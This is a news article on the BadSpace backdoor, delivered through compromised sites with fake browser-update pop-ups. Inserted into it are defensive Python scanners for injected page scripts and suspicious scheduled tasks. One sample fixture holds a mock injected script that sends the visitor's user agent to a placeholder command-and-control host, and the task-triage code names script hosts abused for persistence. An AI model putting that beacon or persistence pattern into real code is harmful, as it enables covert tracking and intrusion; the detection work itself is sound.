Threat actors are using legitimate but compromised websites as a vector to distribute a Windows backdoor named BadSpace, disguised as fake browser updates.
“The adversary employs a multi-phase assault strategy involving a tainted website, a command-and-control (C2) server, occasionally a fraudulent browser update, and a JScript downloader to implant a backdoor in the victim’s system,” disclosed German cybersecurity firm G DATA in a recent report.
Researchers kevross33 and Gi7w0rm first unveiled details of the malware last month.
The intrusion begins with a compromised website, frequently built on WordPress, into which code has been injected to determine whether a user is visiting for the first time.
If it is the initial visit, the injected code harvests information about the device, IP address, user-agent, and location, then transmits it to a predefined domain via an HTTP GET request.
The server’s response then overlays the web page content with a counterfeit Google Chrome update pop-up, designed to deliver either the malware directly or a JavaScript downloader that in turn fetches and executes BadSpace.
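The injection chain above (first-visit check, visitor fingerprinting, beacon to an external host) leaves a recognisable footprint in the page source itself. The following is an added example, not G DATA's tooling or any code from the campaign: a small scanner that pulls inline scripts out of a page and flags those combining all three traits. The sample HTML, the site host `blog.example.org` and the beacon host `c2.example.invalid` are constructed for the example; the regexes are heuristics, not indicators from the report.

```python
"""Flag inline scripts that look like a fake-browser-update injection.

Added example (not G DATA's code). Heuristic: an inline <script> that
(1) keys behaviour on a first-visit marker (cookie/storage),
(2) collects visitor fingerprint data (user agent, screen, geo/IP), and
(3) issues a request to a host other than the site's own.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_VISIT = re.compile(r"document\.cookie|localStorage|sessionStorage", re.I)
FINGERPRINT = re.compile(r"navigator\.(userAgent|platform|language)|screen\.(width|height)|geolocation", re.I)
BEACON = re.compile(r"\bfetch\s*\(|XMLHttpRequest|new\s+Image\s*\(|\.src\s*=", re.I)
URL_RE = re.compile(r"https?://[^\s'\"`)]+", re.I)


class _ScriptCollector(HTMLParser):
    """Collect (src, body) pairs for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def score_script(body, site_host):
    """Return (traits, external_hosts) for one inline script body."""
    traits = []
    if FIRST_VISIT.search(body):
        traits.append("first-visit-check")
    if FINGERPRINT.search(body):
        traits.append("fingerprinting")
    hosts = sorted({h for h in (urlparse(u).hostname for u in URL_RE.findall(body))
                    if h and h.lower() != site_host.lower()})
    if hosts and BEACON.search(body):
        traits.append("external-beacon")
    return traits, hosts


def find_injections(html, site_host):
    """Return findings for inline scripts that show all three traits."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for index, (src, body) in enumerate(parser.scripts):
        if src or not body.strip():
            continue  # external or empty scripts are out of scope here
        traits, hosts = score_script(body, site_host)
        if len(traits) == 3:
            findings.append({"index": index, "traits": traits, "hosts": hosts})
    return findings


# Constructed sample page: one legitimate local script, one injected block,
# one harmless inline script. Hosts are placeholders, not real indicators.
SAMPLE_HTML = """<html><head><title>Blog</title>
<script src="/wp-includes/js/jquery.js"></script>
<script>
  if (!document.cookie.includes("seen=1")) {
    document.cookie = "seen=1; path=/";
    var q = "ua=" + encodeURIComponent(navigator.userAgent);
    fetch("https://c2.example.invalid/collect?" + q);
  }
</script></head><body><p>hello</p>
<script>console.log("legit analytics");</script>
</body></html>"""

if __name__ == "__main__":
    for f in find_injections(SAMPLE_HTML, "blog.example.org"):
        print(f"script #{f['index']}: {', '.join(f['traits'])} -> {f['hosts']}")
```

The check deliberately requires all three traits so that ordinary analytics (fingerprinting plus a beacon, but no first-visit gating of page replacement) is not flagged; externally sourced loader scripts are skipped here and would need a separate allow-list of expected script hosts.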
Examination of the C2 servers employed in this campaign has revealed links to a known malware dubbed SocGholish (also known as FakeUpdates), a JavaScript-based downloader propagated through similar methods.
BadSpace, beyond employing anti-sandbox measures and establishing persistence through scheduled tasks, can exfiltrate system information and execute commands that enable it to capture screenshots, execute instructions via cmd.exe, read and write files, and delete the scheduled task.
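Persistence via scheduled tasks is the one behaviour above that leaves a durable artifact a responder can triage offline. The following is an added example, not G DATA's code and not tied to any task name or path from the report (the page gives none): it parses exported Windows Task Scheduler XML and flags tasks whose action executes from a user-writable directory, or whose action is a script host launched against a file in such a directory. The task XML samples and the paths in them are constructed; the directory list is a general heuristic and an assumption of this example.

```python
"""Triage exported Windows scheduled-task XML for suspicious persistence.

Added example (not G DATA's code). Reads the Task Scheduler XML schema
(the real namespace below) and applies a general heuristic: executables or
script arguments living under user-writable locations, plus a logon trigger.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Assumption of this example: directories where a non-admin user can write.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)
# Script hosts / interpreters commonly used to run a payload from such a path.
SCRIPT_HOSTS = re.compile(
    r"(?:^|\\)(rundll32|regsvr32|wscript|cscript|mshta|powershell|pwsh|cmd)(\.exe)?\s*$", re.I)


def triage_task(xml_text):
    """Return a list of human-readable reasons a task looks suspicious."""
    root = ET.fromstring(xml_text)
    reasons = []
    for ex in root.findall(".//t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", default="", namespaces=NS) or "").strip().strip('"')
        args = (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        if USER_WRITABLE.search(cmd):
            reasons.append(f"command in user-writable path: {cmd}")
        if SCRIPT_HOSTS.search(cmd) and USER_WRITABLE.search(args):
            reasons.append(f"script host {cmd} launching from user-writable path: {args}")
    if reasons and root.find(".//t:Triggers/t:LogonTrigger", NS) is not None:
        reasons.append("runs at logon")
    return reasons


# Constructed task definitions (paths are placeholders, not indicators).
SAMPLE_SUSPICIOUS = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Users\alice\AppData\Roaming\update\svc.exe</Command>
  </Exec></Actions>
</Task>"""

SAMPLE_LOLBIN = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Windows\System32\wscript.exe</Command>
    <Arguments>//B C:\Users\alice\AppData\Local\Temp\upd.js</Arguments>
  </Exec></Actions>
</Task>"""

SAMPLE_BENIGN = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\Program Files\Vendor\updater.exe</Command>
  </Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in [("suspicious", SAMPLE_SUSPICIOUS), ("lolbin", SAMPLE_LOLBIN),
                           ("benign", SAMPLE_BENIGN)]:
        print(name, "->", triage_task(xml_text) or ["no findings"])
```

On a live host the same function can be fed the files under `C:\Windows\System32\Tasks`, which hold each task's definition in this XML form; the heuristic is a starting point for triage, not proof of compromise, since legitimate per-user installers also register tasks from AppData.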
This revelation coincides with warnings from eSentire and Sucuri regarding various campaigns utilizing fraudulent browser update prompts on compromised sites to disseminate information stealers and remote access trojans.